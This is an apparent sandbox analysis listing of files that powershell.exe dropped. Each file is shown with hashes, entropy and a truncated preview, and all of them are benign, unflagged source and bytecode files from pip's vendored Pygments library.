                              Preview:""". Pygments. ~~~~~~~~.. Pygments is a syntax highlighting package written in Python... It is a generic syntax highlighter for general use in all kinds of software. such as forum systems, wikis or other applications that need to prettify. source code. Highlights are:.. * a wide range of common languages and markup formats is supported. * special attention is paid to details, increasing quality by a fair amount. * support for new languages and formats are added easily. * a number of output formats, presently HTML, LaTeX, RTF, SVG, all image. formats that PIL supports, and ANSI sequences. * it is usable as a command-line tool and as a library. * ... and it highlights even Brainfuck!.. The `Pygments master branch`_ is installable with ``easy_install Pygments==dev``... .. _Pygments master branch:. https://github.com/pygments/pygments/archive/master.zip#egg=Pygments-dev.. :copyright: Copyright 2006-2023 by the Pygments team, see AUTHO
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:Python script, ASCII text executable
                              Category:dropped
                              Size (bytes):353
                              Entropy (8bit):4.920011790990273
                              Encrypted:false
                              SSDEEP:6:Y6ejA2UeqOUcMrqA1Akssu9IuH8HodrC1QATkTAFMuwdlEkc:Y6epArqA1bssqn8HodmCVYMHd/c
                              MD5:10FA0A45A3D060D07E1C9E502923E13A
                              SHA1:2B06C1D0254222D69A45DB8451D6C5A884285E5A
                              SHA-256:7ACF0428CBD78F9C93A087D0FA97F70EFE539C879E33AB0C1342D6FA7E1E707A
                              SHA-512:031F304CA66A48AF4B064B92DBD79189E5164380E6D5B877042B40A59839217156581D7CBAF20B5F0C082EE65EC3936E26A58C33B3EDC7D4CFDB3A0CAD61BD7C
                              Malicious:false
                              Preview:""". pygments.__main__. ~~~~~~~~~~~~~~~~~.. Main entry point for ``python -m pygments``... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.."""..import sys.from pip._vendor.pygments.cmdline import main..try:. sys.exit(main(sys.argv)).except KeyboardInterrupt:. sys.exit(1).
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3499
                              Entropy (8bit):5.488732116317891
                              Encrypted:false
                              SSDEEP:96:NAH4DtykEe7HswKpKSCNYpCM/hMuzNKUNTMdbCeobUS:NltykEe7jIbQUqdbC7p
                              MD5:9C1A2CAF189C9177976C5B9E155908CE
                              SHA1:66344E69D4C4C71B688806923F8275C19E4697C8
                              SHA-256:F599E0CD444DB5FB52343CBEDF004D9F60751DEE0E3F572B8C456B79AA903C14
                              SHA-512:60C89B8C139A0D17C4AC81ECD0A2FCEC73112477E8B02371F5729D11D5770579CFDD562AA9240789B5F22A6711B5DC778F20EC80828D3901C9635A42CD9F2588
                              Malicious:false
                              Preview:........=.Cf..........................>.....d.Z.d.d.l.m.Z.m.Z...d.Z.d.Z.g.d...Z.d...Z.d.d...Z.d.d...Z.y.).a..... Pygments. ~~~~~~~~.. Pygments is a syntax highlighting package written in Python... It is a generic syntax highlighter for general use in all kinds of software. such as forum systems, wikis or other applications that need to prettify. source code. Highlights are:.. * a wide range of common languages and markup formats is supported. * special attention is paid to details, increasing quality by a fair amount. * support for new languages and formats are added easily. * a number of output formats, presently HTML, LaTeX, RTF, SVG, all image. formats that PIL supports, and ANSI sequences. * it is usable as a command-line tool and as a library. * ... and it highlights even Brainfuck!.. The `Pygments master branch`_ is installable with ``easy_install Pygments==dev``... .. _Pygments master branch:. https://github.com/pygments/pygme
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):745
                              Entropy (8bit):5.569113025404681
                              Encrypted:false
                              SSDEEP:12:dJSBcKh6FHvVyi6epArqA1bssqs4ZxIAOyfnEImaM3ajq12nMuNjytEHzK:z+gz6epAGAoq+IE83fqjJjlHzK
                              MD5:7150203B2EC61A966A1F5F7DF3630935
                              SHA1:7CFF4795AE89E419ACEDFCE3ACEFE05CF2D945F1
                              SHA-256:C27B7ABE33D1942DEFF10866022ADFE06BB7F6D8636AFA8A03200E3496B61E94
                              SHA-512:61D37DEC9EDC95BBA1BF976A5D89EF6BC0AFE211F2AD0F6E203ABDDC2B66709B18CF9F797C69480B45AAA61258B08B15BCEDA0DE6DAF5DCE0F4C96B8DA70CBB8
                              Malicious:false
                              Preview:........=.Cfa..............................d.Z.d.d.l.Z.d.d.l.m.Z.......e.j.....................e.e.j.....................................y.#.e.$.r.....e.j...................d...........Y.y.w.x.Y.w.).z.. pygments.__main__. ~~~~~~~~~~~~~~~~~.. Main entry point for ``python -m pygments``... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...main.....)...__doc__..sys..pip._vendor.pygments.cmdliner......exit..argv..KeyboardInterrupt........iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/__main__.py..<module>r........sI....................-.........C.H.H.T.#.(.(.^................C.H.H.Q.K......s....."1...A.....A..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):26616
                              Entropy (8bit):5.523539341517189
                              Encrypted:false
                              SSDEEP:768:qgjiqUWfCPHhz7nnJqxUgXU4ZF8GBcRP6W2xUOy:9b5CPBz7nGUgXU4ZGP72Kt
                              MD5:4BFAD3286D4C95172B8FE72AAAE92E50
                              SHA1:AA95FCDE65B34A7AAA2DAF8B8D54319DC1EA1410
                              SHA-256:75A3CD59A1B761A035072E84BE2F577485DC8CF221CC8232231A845169FD1FB9
                              SHA-512:FE75716D561E26B212C795E683E3471C29A3D799D1D85520431CC1D918F3F1DC826BC0A2D689A2D8CA614BC59C528582628B10DB5D906C0373A6EC4D09ADF2E3
                              Malicious:false
                              Preview:........=.Cf.\........................h.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m Z m!Z!m"Z"m#Z#..d.d.l$m%Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*m+Z+..d.d.l,m-Z-m.Z...d...Z/d...Z0d...Z1d...Z2d...Z3d...Z4..G.d...d.e.jj..........................Z5e.jl..................f.d...Z7y.).z.. pygments.cmdline. ~~~~~~~~~~~~~~~~.. Command line interface... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...dedent)...__version__..highlight)...ClassNotFound..OptionError..docstring_headline..guess_decode..guess_decode_from_terminal..terminal_encoding..UnclosingTextIOWrapper)...get_all_lexers..get_lexer_by_name..guess_lexer..load_lexer_from_file..get_lexer_for_filename..find_lexer_class_for_filename)...TextLexer)...LatexEmbeddedLexer..LatexFormatter)...get_all_formatters..get_formatter_by_name..load
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):2637
                              Entropy (8bit):5.632884110365061
                              Encrypted:false
                              SSDEEP:48:lANaUGlGGwdCsxS6CLbP+EwHO64tabBZQkKd+g2viSv2m5I37pd:tVkNCoS6C3s8e7dvi+Uj
                              MD5:D1131DCBDC3F6E5344ADD5EBA6CFE4ED
                              SHA1:ABF1D3E899A9DEC3E9159D939D0E3D32CA069F44
                              SHA-256:2D07C7F64C8BBF96F8068465F0DDB57A3A8F5F36EDC03589490B65777A796BDD
                              SHA-512:1D02E3596D1486AFA7DA8D5EAAD47B3B62B6AB5344F8C98D881F283414611FF4F0358D813572763C4F430D047BB6B883126BABE644DA9CD5F98969A4BE6A6860
                              Malicious:false
                              Preview:........=.Cf..........................$.....d.Z.d.Z.i.Z.d.e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...e.d.z...e.d.<...g.d...Z.g.d...Z.d.Z...e.e.e.........D.]#..\...Z.Z.e.d.e.z...z...e.e.<...e.d.d.e.z...z...z...e.e.<...e.d.z...Z..%..[.[.[.e.d.....e.d.<...d...Z.d...Z.d...Z.y.).z.. pygments.console. ~~~~~~~~~~~~~~~~.. Format colored console output... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..z..[..z.39;49;00m..reset..01m..bold..02m..faint..03m..standout..04m..underline..05m..blink..06m..overline)...black..red..green..yellow..blue..magenta..cyan..gray)...brightblack..brightred..brightgreen..brightyellow..brightblue..brightmagenta..brightcyan..white.....z.%im.<........r....c...........................t.........d.....S...Nr........codes........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/console.py..rese
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3243
                              Entropy (8bit):5.222034270189328
                              Encrypted:false
                              SSDEEP:48:ZCaaSGZUGtuBWoPyzLXitxOvKaWp1+erceh4ev5Yne8a6i/go3qveLPzGxqUkAA:ZhaSkUIubyfKbUW4M58u6MChjA
                              MD5:83ED29ECAD2BEE82651A846E4C51E843
                              SHA1:D226EE44AFA9B1A79697A870282DAF9E718CDE9C
                              SHA-256:087C4EAA261F339ABED2213B492B66C342971953F5AFF975ECB701BEB3174E85
                              SHA-512:43F736B93E058D26A29759F837C408AC5F7E2FF6DB37091188A5B3FA7E0D25F4E301C0103B44A32BE585523085EA8BBF38A654EFD758B7CD7CC4AC73D25E3D27
                              Malicious:false
                              Preview:........=.Cf..........................@.....d.Z.d.d...Z.d...Z...G.d...d.........Z...G.d...d.e.........Z.y.).z.. pygments.filter. ~~~~~~~~~~~~~~~.. Module that implements the default filter... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details..Nc.....................2.........f.d...}.|.D.]...}...|.|.|.........}.....|.S.).z.. Use this method to apply an iterable of filters to. a stream. If lexer is given it's forwarded to the. filter, otherwise the filter receives `None`.. c................3....F.....K.....|.j.....................|.........E.d.{.............y.7.....w...N)...filter)...filter_..stream..lexers.... ..gC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/filter.py.._applyz.apply_filters.<locals>._apply....s..............>.>.%....0..0..0.s......!.......!...).r......filtersr....r....r....s.... ` r......apply_filtersr........s(..........1.......).......
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4580
                              Entropy (8bit):5.243048590295455
                              Encrypted:false
                              SSDEEP:96:kCppX+c3BBmgwGvCt798FkwMv/6ypXRIqF9Osqy0:kGH88Fk/7RIUOsY
                              MD5:201DE64A9605C7147C33B3C53B37BE56
                              SHA1:2B0982C4BEEED7E02ABD58B94CCE112ED4440F69
                              SHA-256:B2709BC674114465CAAF1A76377B8535AA14CC5B91818DC7F8261291C9D7135A
                              SHA-512:4ED9B9A8109247BEA8768D2C93BAF168AD1632AC1EDE21CCC4CF88CFF9567D521EAF63D808F89E56EC4EB4BFDAC41F1D847DEAE29D21DB6D39BF6D3C011EA6A4
                              Malicious:false
                              Preview:........=.CfR.........................H.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.g.Z.d...Z...G.d...d.........Z.y.).z.. pygments.formatter. ~~~~~~~~~~~~~~~~~~.. Base formatter class... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...get_bool_opt)...get_style_by_name..Formatterc.....................<.....t.........|.t.................r.t.........|.........S.|.S.).N)...isinstance..strr....)...styles.... .jC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/formatter.py.._lookup_styler........s..........%....... ....'..'....L.....c.....................4.....e.Z.d.Z.d.Z.d.Z.g.Z.g.Z.d.Z.d...Z.d.d...Z.d...Z.y.).r....a..... Converts a token stream to text... Formatters should have attributes to help selecting them. These. are similar to the corresponding :class:`~pygments.lexer.Lexer`. attributes... .. autoattribute:: name. :no-value:.. .. auto
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):38340
                              Entropy (8bit):5.498781454866022
                              Encrypted:false
                              SSDEEP:768:AtyVs+HKAeM7MyKZ6fDc4Dv0oXGFoYywXvLRp638kh:AeTcZ64OGFqwfLS3X
                              MD5:D63ADC204C86F322CD0BCF995D4C0B2A
                              SHA1:E95EC6B6B2B95628DCF8A248F65C045959365DE9
                              SHA-256:79EFDCE2B8D0819E04562787620406EC3F28DB2FCFB5595229CB9290CF522A4D
                              SHA-512:25B74843D5EB90B1386291BA9C1B672D2E0E03FE88C0B3D00719D28F47481E9B18B6037B48B18358D062E5D931E26309DF14BB3DC831BFECD85688C7798697D6
                              Malicious:false
                              Preview:........=.Cf:.........................X.....d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...g.d...Z...e.j2..................d.........Z.g.d...Z...e.d...........Z...G.d...d.e.........Z...G.d...d.e...........Z ..G.d...d.e ........Z!..G.d...d.e"........Z#..G.d...d.........Z$..e$........Z%..G.d...d.e&........Z'..G.d...d.........Z(d...Z)..G.d...d.........Z*..e*........Z+d...Z,..G.d...d ........Z-..G.d!..d"e.........Z...G.d#..d$e.........Z/..G.d%..d&e e/..........Z0..G.d'..d(........Z1..G.d)..d*e0........Z2d+..Z3..G.d,..d-e/........Z4..G.d...d/e0e4..........Z5y.)0z.. pygments.lexer. ~~~~~~~~~~~~~~.. Base lexer classes... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...apply_filters..Filter)...get_filter_by_name)...Error..Text..Other..Whitespace.._TokenType)...get_bool_opt..get_int_opt..get_list_opt..make_analysator..Future..guess
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):1579
                              Entropy (8bit):5.575039711396838
                              Encrypted:false
                              SSDEEP:24:Trkx/GAoq3qk8/7Yi2wYFoJ3foSCt5mQkB4r2ZVpamaN81ajAnG4ZrKI6id7wx:Trkx/GJ6UPBs5mQkVVy8U4ZrsiFwx
                              MD5:1D5C959477B829F77AF35A16A87BA27A
                              SHA1:0007962C8187E5CA77961741997713A7C2C4CBEB
                              SHA-256:D5C5943E8CCF1239D35F47CEDCBE2E93E0E0E4DC1B66EF8D0153A8B37F844C3D
                              SHA-512:7A5E68EF48D1941434E2B9CFF546A9E4C377DF4970B6FC39C1A8C24C50C5BA54147F091796A405C4C93D635F0CF41108430B0CA8A631A9A2419C52DCC0E006E9
                              Malicious:false
                              Preview:........=.Cf..........................^.....d.Z.d.d.l.Z.d.g.Z...e.j...................d.e.j...........................Z.d...Z.d.d...Z.y.).z.. pygments.modeline. ~~~~~~~~~~~~~~~~~.. A simple modeline parser (based on pymodeline)... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N..get_filetype_from_bufferze. (?: vi | vim | ex ) (?: [<=>]? \d* )? :. .* (?: ft | filetype | syn | syntax ) = ( [^:\s]+ ).c.....................T.....t.........j...................|.........}.|.r.|.j...................d.........S.y.).N.....)...modeline_re..search..group)...l..ms.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/modeline.py..get_filetype_from_liner........s(...............1....A.......w.w.q.z.............c...........................|.j...........................}.|.d.|...d.z...d.......D.]...}.t.........|.........}.|.s...|.c...S...t.........|.d.d.........D.]%..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):3407
                              Entropy (8bit):5.525586685767953
                              Encrypted:false
                              SSDEEP:48:8WOhRbZ6mQ4Aa4vRpmCgVVGtEUc5dSs+yBMRMbdD+PCwPTVGBRPKuomiAAiyyiiG:KhRbZ6rNLvOCWVOEUcxMCQ0BVpoT
                              MD5:8B4489F28F0BAC7EC5546DEC56783BD2
                              SHA1:71F7BB56A91956F17F55940013FA90A71A9F5E93
                              SHA-256:E58A5A838FDF3FB49573DE025807B762C7E62AA256DCA34F82FF122B6D30446E
                              SHA-512:B3806DD666168B1500C5BF20493DF0B9AD2823C9E881DE3270621B470232F0A351847150DD40DCAC7F5ACB568A02E19E64CDD7F22BF4C67CA1E25486CCE7BE11
                              Malicious:false
                              Preview:........=.Cf..........................6.....d.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.).a..... pygments.plugin. ~~~~~~~~~~~~~~~.. Pygments plugin interface. By default, this tries to use. ``importlib.metadata``, which is in the Python standard. library since Python 3.8, or its ``importlib_metadata``. backport for earlier versions of Python. It falls back on. ``pkg_resources`` if not found. Finally, if ``pkg_resources``. is not found either, no plugins are loaded at all... lexer plugins::.. [pygments.lexers]. yourlexer = yourmodule:YourLexer.. formatter plugins::.. [pygments.formatters]. yourformatter = yourformatter:YourFormatter. /.ext = yourformatter:YourFormatter.. As you can see, you can define extensions for the formatter. with a leading slash... syntax plugins::.. [pygments.styles]. yourstyle = yourstyle:YourStyle.. filter plugin::.. [pygments.filter]. yourfilter = y
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4092
                              Entropy (8bit):5.5876366149602354
                              Encrypted:false
                              SSDEEP:96:xZeiiTrACsTJsoV/MsH54Q1uuu1woeFpBFaxP2MN1OU:CoCsTJsoNV5Kuu1HIBgxP2MN1OU
                              MD5:E86C381B14D3072033EC0D115D246135
                              SHA1:4F99126CC831BD162D97D9E17A4A25E3DB020856
                              SHA-256:62269E1B90C101654AC4F34B16A31A7C8D7E4EF9B34553D86176310CE79AC374
                              SHA-512:BDCF3E4039F430423498D33E7908E1A68280ADE9AF564FCCF9935ECFA554C2D6752F7348C6289779C9B8F499BF7E1C72FE3826ADE4668198FF64108302CA90DE
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j...................d.........Z...e.d.........Z.d...Z.d...Z.d.d...Z.y.).a..... pygments.regexopt. ~~~~~~~~~~~~~~~~~.. An algorithm that generates optimized regexes for matching long lists of. literal strings... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...escape)...commonprefix)...groupby)...itemgetterz.[\[\^\\\-\]]c.....................Z.....d.t.........j...................d...d.j...................|.................z...d.z...S.).N..[c.....................(.....d.|.j...........................z...S.).N..\)...group)...ms.... .iC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/regexopt.py..<lambda>z.make_charset.<locals>.<lambda>....s.................)9...........])...CS_ESCAPE..sub..join)...letterss.... r......make_charsetr........s'..............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):4767
                              Entropy (8bit):5.022456956968866
                              Encrypted:false
                              SSDEEP:96:0Eit5EKk5fMcVwMM/h97ffyk/gIzQ0Aj4NPcwpqzve:ritn/cVwMMX73yzIqjePvYz2
                              MD5:F570098B56880AB3FB6698FD43CED475
                              SHA1:3E7688B78313C79F02295C1CB1FAC2F973B94470
                              SHA-256:30E324EB575535A7823BC32E17AD43DE4913DA3AC1C169354BCFC960D0A7ADEF
                              SHA-512:B67DE238CC23704A78FA0685F232931F5D0BF6D0DB48E305BE4D14DFA7E7EC198E3AF074062D41E1AB1E1941F878E4D57BF6A2E1A5616B7F1103297B4137CFEA
                              Malicious:false
                              Preview:........=.Cf..........................:.....d.Z.d.d.l.Z...G.d...d.e.........Z...G.d...d.........Z.y.).a..... pygments.scanner. ~~~~~~~~~~~~~~~~.. This library implements a regex based scanner. Some languages. like Pascal are easy to parse but have some keywords that. depend on the context. Because of this it's impossible to lex. that just by using a regular expression lexer like the. `RegexLexer`... Have a look at the `DelphiLexer` to get an idea of how to use. this scanner... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......Nc...........................e.Z.d.Z.d.Z.y.)...EndOfTextzZ. Raise if end of text is reached and the user. tried to call a match function.. N)...__name__..__module__..__qualname__..__doc__........hC:\Users\boadi\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_vendor/pygments/scanner.pyr....r........s...........r....r....c.....................b....
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):11057
                              Entropy (8bit):5.345110498869594
                              Encrypted:false
                              SSDEEP:192:MMxMGaRyuY4EkU5LTs3iCB7Pe7FS5OTiecqyLGp40pQvsXEAfyOcW2cRtQRr4AFa:f2EWUpVfMz0zVQkXEAfWuRtQoJpO+
                              MD5:D18F20170C29AE438A2A53E17705D102
                              SHA1:3531C2F45BE56108F2C73386DB83C745DEEF88ED
                              SHA-256:9A5F2877688F8F61E378627B2EE71197C4934FEFECE557DCEA1AA690CFF1D585
                              SHA-512:95A1ABAABF8C1444B1C8A9B7E5BA15EACB4F2F2D023A7CA9091E641E3B775C4B6FE357739CEEC24B573541E65F8CFE7925B0F9674BF3D3B677FF12BBC8625DC8
                              Malicious:false
                              Preview:........=.Cf..........................l.....d.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d.Z.d.Z.d.Z...G.d...d.e.........Z.d...Z.y.).a..... pygments.sphinxext. ~~~~~~~~~~~~~~~~~~.. Sphinx extension to generate automatic documentation of lexers,. formatters and filters... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...nodes)...ViewList)...Directive)...nested_parse_with_titlesz.... module:: %s..%s.%s.zX... class:: %s.. :Short names: %s. :Filenames: %s. :MIME types: %s.. %s..zA... class:: %s.. :Short names: %s. :Filenames: %s.. %s..z'... class:: %s.. :Name: %s.. %s..c.....................B.....e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.i.Z.d...Z.d...Z.d...Z.d...Z.d...Z.y.)...PygmentsDoczn. A directive to collect all lexers/formatters/filters and generate. autoclass directives for them.. F.....r....c..........................t.................|._.........|.j.
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):6685
                              Entropy (8bit):5.784152606796973
                              Encrypted:false
                              SSDEEP:96:DOWbtBrxXaCpLr/0GDQQ6bCRuTRt6vov+6H6N0+ClMTYAzin05adK:ykqiv/0GsrTfJkbCdn05aU
                              MD5:DF6AF7575596339A9C3778D9652ADD68
                              SHA1:FB20151182D3A3DB6E754500F394D13247717E51
                              SHA-256:6F73D7F98DE49E95E9504ADDBCE48E7A529C39BC12B1E5623D69346B2F7C7FD4
                              SHA-512:9F4E0D6673A00B8E9839B3831DB7482E27001CBC94216629C72440EB526DFB08A4B6A75F75C249B38B7DFC1E18561B9FB3D2309F346E6A7017AA06D0C6D70BDF
                              Malicious:false
                              Preview:........=.Cfq...............................d.Z.d.d.l.m.Z.m.Z...i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d ..d!d"..Z.i.d#d...d$d...d%d...d&d...d'd...d(d...d)d...d*d...d+d...d,d...d-d...d.d...d/d...d0d...d1d...d2d!..Z...e.e.........Z...G.d3..d4e.........Z...G.d5..d6e..7........Z.y8)9z.. pygments.style. ~~~~~~~~~~~~~~.. Basic style object... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......)...Token..STANDARD_TYPES..ansiblack..000000..ansired..7f0000..ansigreen..007f00..ansiyellow..7f7fe0..ansiblue..00007f..ansimagenta..7f007f..ansicyan..007f7f..ansigray..e5e5e5..ansibrightblack..555555..ansibrightred..ff0000..ansibrightgreen..00ff00..ansibrightyellow..ffff00..ansibrightblue..0000ff..ansibrightmagenta..ff00ff..ansibrightcyan..00ffff..ansiwhite..ffffffz.#ansiblackz.#ansidarkredz.#ansidarkgreenz.#ansibrownz.#ansidarkbluez.#ansipurplez.#ansitealz.#ansilightgrayz.#ans
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):8153
                              Entropy (8bit):5.203011340997149
                              Encrypted:false
                              SSDEEP:192:7fm4Auxsd5aK/T/nEOE2c9t1KjediXJrMLF88o:hAuxysST3E2c9tGediZro88o
                              MD5:07461EEA5840E8041DF94BD1EDF14CCC
                              SHA1:995F969451935DAD9CB322310A219712DECBEABE
                              SHA-256:1F650ED3B6755A60EC23D2A043130D3BB3F45EAEDAE4E598314565E07F274DE8
                              SHA-512:3A03EB98B6405A087060BDD4D3C17866D9881BF4A1B7AF87D136FAB7931AAB884E073F66D593EC0EE15B3663A9300192604033A364B2835883B764F167F46D7D
                              Malicious:false
                              Preview:........=.Cf(...............................d.Z...G.d...d.e.........Z...e.........Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j...................Z.e.j ..................Z.e.j"..................Z.e.e._.........e.e._.........e.e._.........d...Z.d...Z.i.e.d...e.d...e.d...e.d...e.d...e.d...e.d...e.j(..................d...e.j*..................d...e.j,..................d...e.j...................d...e.j0..................d...e.j2..................d...e.d...e.j4..................d...e.j6..................d...e.j6..................j...................d...i.e.j8..................d...e.j(..................d...e.j:..................d...e.j<..................d...e.j>..................d...e.j@..................d...e.j@..................jB..................d...e.jD..............
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):32999
                              Entropy (8bit):6.29249273919867
                              Encrypted:false
                              SSDEEP:768:4GqAJsUe2glKVaCxJNmJAokJE5l2o5VTr9iU/:4XAOfWVaCxJ/JE5lZTr3
                              MD5:E4A40FA20E250BCDFE95CC9FD4CB062F
                              SHA1:1F1A1D962742962B5CD1DCBFB256B4D5D7BD2B08
                              SHA-256:929F098B44E28C9DACE22DF5ECCE327476725F5D204DB307E45CD0EBCEEEA329
                              SHA-512:72C24C748F8CA599056EBEB17FF9B8983A0DAE905AD81656D2CB96EB3A7BA8870E1E4833756B72641D9764A7DA132806392F2BBA3E231B478373A007FCEF3B55
                              Malicious:false
                              Preview:........=.Cf...............................d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d Z g.d!..Z!d"..Z"d#..Z#d$..Z$e%d%k(....r.d&d'l&Z&g.g.d(..Z'..e(e)d).*........5.Z*e*jW..........................Z,d'd'd'..........e,d'e,j[..................d+..........Z.e,e,j[..................d,........d'..Z/..e0d-........D.]...Z1..e2e1........Z3..e&jh..................e3........Z5..e6e3........d.k(..r.d/e3z...Z3n...e6e3........d0v.r.d/e3z...Z3e'jo..................e5g.........jq..................e3..........e3js..........................r.e'd1....jq..................e3..........d2e3z...js..........................s...e'd3....jq..................e3................e(e)d4d).*........5.Z*e*ju..................e.............e;e'........D.]3..Z5d5jy....................e$e'e5....................Z=e*ju..................e5..d6e=..d7.............5....e;e'........Z!e!j}..................d1..........e!j}..................d3..
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                              File Type:data
                              Category:dropped
                              Size (bytes):13992
                              Entropy (8bit):5.4663763600817115
                              Encrypted:false
                              SSDEEP:384:1H1bp5yTrzIm3UMWXHfV3IphWK8X9WISw8jEGARH:t1bcr0GU1/VYHWK8XUTw8wGARH
                              MD5:51F4E64F8732F8C77DC1E44E17923D1E
                              SHA1:F280877FD2FBD16E4266B797B15B7868AF147ED1
                              SHA-256:9F60AAAC20AED2AFB0CCD5E7DCA15BF09EFE4D0DFF94FDCF8EA0FB2FEA4A71B6
                              SHA-512:D513596C6C5E161652B1DD229CCC7FDED3DDED66F91F17DD9FE4FBCBAC539FBFEB15549C35457577FEAB50244AE46193E31AA1CFD59858A3D62C1EFE0AEEECFC
                              Malicious:false
                              Preview:........=.Cf.'..............................d.Z.d.d.l.Z.d.d.l.m.Z.....e.j...................d.........Z...e.j...................d.e.j...................e.j...................z...e.j...................z...........Z...e.j...................d.e.j...................e.j...................z...e.j...................z...........Z...e.j...................d.e.j...........................Z...G.d...d.e.........Z...G.d...d.e.........Z.d d...Z.d!d...Z.d!d...Z.d!d...Z.d...Z.d...Z.d...Z.d...Z.d...Z.i.Z.d...Z.d...Z.d"d...Z.d#d...Z...G.d...d.........Z d...Z!d...Z"d...Z#..G.d...d.e.........Z$y.)$z.. pygments.util. ~~~~~~~~~~~~~.. Utility functions... :copyright: Copyright 2006-2023 by the Pygments team, see AUTHORS.. :license: BSD, see LICENSE for details.......N)...TextIOWrapperz.[/\\ ]z.. <!DOCTYPE\s+(. [a-zA-Z_][a-zA-Z0-9]*. (?: \s+ # optional in HTML5. [a-zA-Z_][a-zA-Z0-9]*\s+. "[^"]*")?. ). [^>]*>.z.<(.+?)(\s.*?)?>.*?</.+?>z.\s*<\?xml[^>]*\?>c..........
                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
